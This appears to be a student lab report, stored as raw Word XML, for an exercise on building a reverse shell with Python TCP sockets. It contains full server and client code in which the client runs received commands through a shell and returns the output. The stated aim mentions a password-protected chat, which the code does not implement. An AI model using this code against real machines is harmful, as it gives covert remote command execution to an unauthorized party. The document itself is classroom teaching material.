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C4548" w14:textId="2F6E6679" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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7B3F">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Exp.No.12</w:t>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roofErr w:type="spellStart"/>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Keerthika.k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="653AFBD9" w14:textId="5B2E7586" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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241901046</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC141E7" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">
      <w:p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DA9E25" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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F1B3C2" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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1BBF">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 a program to create reverse shell using TCP sockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E89C36F" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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1B6EBC" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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BBF">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741456" w14:textId="77777777" w:rsidR="00EF7B3F"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1BB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simple TCP client–server chat program in Python to demonstrate how TCP sockets work, how a server accepts connections, and how a client communicates with the server. Include a minimal password handshake to show basic authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113D129E" w14:textId="77777777" w:rsidR="00EF7B3F"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FFF609" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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C8EB1C6" w14:textId="77777777" w:rsidR="00EF7B3F"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project implements a basic TCP server that listens for incoming connections and a client that connects to it. Once connected, the client and server can exchange text messages. The server handles each client in a separate thread so multiple clients can communicate concurrently. This demonstrates socket creation, binding, listening, connecting, send/receive, and multithreading for concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3946F889" w14:textId="77777777" w:rsidR="00EF7B3F"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B96021" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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p w14:paraId="4CA9D350" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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p>
    <w:p w14:paraId="2A1C91AF" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">
      <w:pPr>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TCP socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250DB673" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">
      <w:pPr>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Bind to host and port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1D2562" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">
      <w:pPr>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Listen for incoming connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FDEA4" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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each accepted connection:</w:t>
      </w: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 Start a new thread to handle that client.</w:t>
      </w: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 In the thread, perform a simple password handshake; if authentication fails, close connection.</w:t>
      </w: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 Receive messages in a loop and echo them back or print them to server console.</w:t>
      </w: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 Close connection when client disconnects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D22B4" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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A9273D" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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530C73" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">
      <w:pPr>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p>
    <w:p w14:paraId="621187F1" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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TCP socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55992588" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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 to server host and port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F41AB58" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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 the password for handshake, wait for server acceptance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4557401C" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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accepted, run a send loop to allow user to type messages and a receive loop to print server responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4356CD" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">
      <w:pPr>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 connection on user quit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565CE24" w14:textId="77777777" w:rsidR="00EF7B3F"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A2027B" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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(code):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B462CDB"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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33B748"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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010B2A50"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62FAC8"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 '127.0.0.1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B9B95"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port = 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC68B2"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D97AC0"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create_server_socket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46E035"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server =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socket.SOCK_STREAM</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141D87"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server.bind</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port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBDC0CD"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server.listen</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299A3C96"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print(f"[+] Listening on {host}:{port}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D12FE3E"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server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB04964"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FC7C5D"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handle_client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E3BB927"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print(f"[+] Connection established with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743ADDF0"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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1161390D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D65ABF"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 = input(f"{</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[0]}@shell&gt; ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6445FA"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command.lower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'quit':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD5393"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conn.send</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command.encode</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DBFA62"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conn.close</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213C1F"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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310C45C8"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command.strip</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DDDF4D"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conn.send</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command.encode</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0CC580D"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response =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conn.recv</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(4096).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5AC4B7"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print(response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273959BA"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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3405B7"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print(f"[!] Error: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC32D2"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conn.close</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C66700"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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A3422"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5EBA9E"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start_server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2A1710"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server =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create_server_socket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C3AE96"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True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270D6804"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conn,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server.accept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85C2BC8"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client_thread</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threading.Thread</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handle_client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0878B1"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client_thread.start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0ADA65"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692219"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__name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4DBE8D"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start_server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393D3CE" w14:textId="77777777" w:rsidR="00EF7B3F"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316299" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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A05C7A" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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(code):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41088671"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socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A79E2"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subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2D554"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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E7EC5AB"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71F5E8"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 '127.0.0.1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF39562"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port = 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B68AC0"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F5996D"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connect_to_server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0BD4D9"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client =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socket.socket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socket.AF_INET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socket.SOCK_STREAM</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F1690A"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client.connect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port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357872A"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E92AA1"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True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F152A31"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A00937D"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command =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client.recv</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(1024).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2326D54A"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command.lower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'quit':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D1382C"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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C64C3FB"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elif</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command.startswith</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('cd '):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF3F6A"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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F08712"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os.chdir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(command[3:].strip())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A94E8"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f"Changed</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directory to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os.getcwd</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AF5A2D"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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C235EA5"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 str(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F2A1CD"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6E3628B6"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process =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subprocess.Popen</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(command, shell=True,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stdout</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subprocess.PIPE</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stderr=</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subprocess.PIPE</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stdin=</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subprocess.PIPE</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C4B5E5"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process.stdout.read</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process.stderr.read</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82DBB2"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output =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output.decode</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6331CC5"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current_dir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os.getcwd</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"&gt; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E39AFE"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client.send</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 "\n" +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current_dir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).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BDCBA1"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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1339B2A9"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client.send</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(str(e).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787C8B3"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brea</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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B438F"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client.close</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CB9831"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9A886F" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7"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__name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D70F519" w14:textId="77777777" w:rsidR="00EF7B3F"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connect_to_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008311C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7793C6" w14:textId="77777777" w:rsidR="00EF7B3F"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6D0F03" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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484">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(Output):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E5B823" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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484">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>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6AADDBE" wp14:editId="4409A1DB">
            <wp:extent cx="4815840" cy="1500505"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="143030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03628" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4815840" cy="1500505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD5EC96" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="008311C7" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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484">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>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093349C" wp14:editId="6A562DA5">
            <wp:extent cx="3611880" cy="2555846"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="171115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57222" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3645990" cy="2579983"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E1F01E" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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 (output):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C55629" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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484">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>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721FF24" wp14:editId="3E45C6A5">
            <wp:extent cx="5731510" cy="651510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="96251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17195" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="651510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="788743A0" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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3A3E11" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="00110484" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3F">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484">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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C1692" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRPr="00110484" w:rsidRDefault="00EF7B3F" w:rsidP="00EF7B3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048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shows a “connection established” message when client connects. Commands typed at the server prompt run on the client and their output appears on the server.cd changes the client’s directory and the new path is returned. Quit ends the session; errors close the connection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2379A7DF" w14:textId="77777777" w:rsidR="00EF7B3F" w:rsidRDefault="00EF7B3F"/>
    <w:sectPr w:rsidR="00EF7B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830"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="436AC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BF5227"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E676C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7315479">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="720521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B3F"/>
    <w:rsid w:val="008161B9"/>
    <w:rsid w:val="00EF7B3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B65C9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FC631F0C-4EED-49F8-9417-241808532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B3F"/>
    <w:rPr>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B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7B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7B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B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B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B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7B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7B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B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7B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B3F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7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B3F"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00EF7B3F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B3F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B3F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B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B3F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00EF7B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604</Words>
  <Characters>3444</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>28</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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dharashani</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>deva dharashani</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-18T10:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-18T10:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>